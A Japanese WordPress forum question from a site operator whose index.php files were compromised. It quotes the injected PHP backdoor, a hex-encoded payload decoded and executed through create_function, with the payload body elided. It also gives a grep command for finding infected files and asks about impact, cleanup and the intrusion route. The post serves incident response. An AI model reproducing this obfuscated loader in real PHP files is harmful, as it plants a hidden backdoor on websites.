PHPファイルに不正なコードが埋め込まれてしまいました
-
お世話になります。
数年程wordpressでサイトを運用しているのですが、どうやらwordpressのindex.phpなどファイルに不正なコードを埋め込まれたようで困っています。下記に調べたことなどを書きます。■調べた事
サイトを見た所TOPページにへんな文字列が挿入されていたので調べてみると下記のコードが埋め込まれていました。<?php /*640db48ec2bddd8591010e2684b9db12*/ $fileChecksum="69662821646566-----スゴイ数字の文字列数千文字----- -----0"; if(!function_exists("hex2asc")){function hex2asc($in){$j=strlen($in)/2;for($i=0;$i<$j;$i++){$out.=chr(base_convert(substr($in,$i*2,2),16,10));}return $out;}} $fileChecksum = create_function(null, hex2asc($fileChecksum)); $fileChecksum(); ?>
640db48ec2bddd8591010e2684b9db12 //md5(‘zalupa’)
このHash値はmd5した値という事はわかりました。zalupaというワードは分かってもそこから先はなにも分かっていません。find . -type f -name “*.php” | xargs grep “fileChecksum”
index.php
./wp-content/index.php
./wp-content/themes/index.php
改ざんされたと思われるファイル。どれも更新時間は今日のam.3時頃でした。色々と調べたのですが、類似したコードが埋まられている事例は見つけられませんでした。
念のために、サーバのパスワード等は変更しましたが原因の究明は至って居ないため、なにかアドバイスを頂ければと思い投稿しました。アドバイス頂きたい事
- 埋め込まれたコードの影響()
- 対処すべきファイル(パーミッションやキャッシュ削除など)
- 侵入経路など(原因の究明のため)
-色々調べてみたサイト
- WordPressのphpファイルが改ざんされたので対処法を http://rbs.ta36.com/?p=17960
- WordPress改ざん? PHPファイルに不正なコードが埋め込まれる件が解決した http://sedoriplan.com/injustice-cord-embedding-php-file/
- WordPress › フォーラム » [セキュリティ バックドア改竄]このコードの役割は? http://ja.forums.wordpress.org/topic/10317?replies=5
6件の返信を表示中 - 1 - 6件目 (全6件中)
6件の返信を表示中 - 1 - 6件目 (全6件中)
- トピック「PHPファイルに不正なコードが埋め込まれてしまいました」には新たに返信することはできません。